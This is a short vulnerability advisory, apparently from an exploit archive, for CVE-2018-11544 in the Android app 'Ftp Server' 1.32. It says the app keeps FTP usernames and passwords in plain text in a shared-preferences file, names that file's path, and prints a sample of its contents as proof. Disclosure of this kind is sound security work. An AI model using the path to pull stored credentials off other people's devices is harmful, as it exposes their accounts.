CVE-2018-11544

1. # Exploit Title: Ftp Server - Insecure Data Storage
2. # Date: 2018-05-29
3. # Software Link: https://play.google.com/store/apps/details?id=com.theolivetree.ftpserver
4. # Version: 1.32 Android App
5. # Vendor: The Olive Tree
6. # Exploit Author: ManhNho
7. # CVE: CVE-2018-11544
8. # Category: Mobile Apps
9. # Tested on: Android 4.4
10.  
11. ---Description---
12. Ftp Server 1.32 Insecure Data Storage, the result of storing confidential information insecurely
13. on the system i.e. poor encryption, plain text, access control issues etc.
14. Attacker can find out username/password of valid user via /data/data/com.theolivetree.ftpserver/shared_prefs/com.theolivetree.ftpserver_preferences.xml
15.  
16. ---PoC---
17. <?xml version='1.0' encoding='utf-8' standalone='yes' ?>
18. <map>
19. <string name="prefPort">2221</string>
20. <string name="prefPasivePort">2300-2399</string>
21. <string name="prefUserpass">ManhNho</string>
22. <boolean name="prefEnergySave" value="false" />
23. <boolean name="prefShowHidden" value="false" />
24. <boolean name="prefShowCredentials" value="true" />
25. <string name="prefInterfaces">0</string>
26. <string name="prefHomeDir">1</string>
27. <string name="prefUsername">ManhNho</string>
28. <boolean name="prefReadonly" value="false" />
29. <boolean name="prefAnonymous" value="true" />
30. <boolean name="prefForeground" value="true" />
31. </map>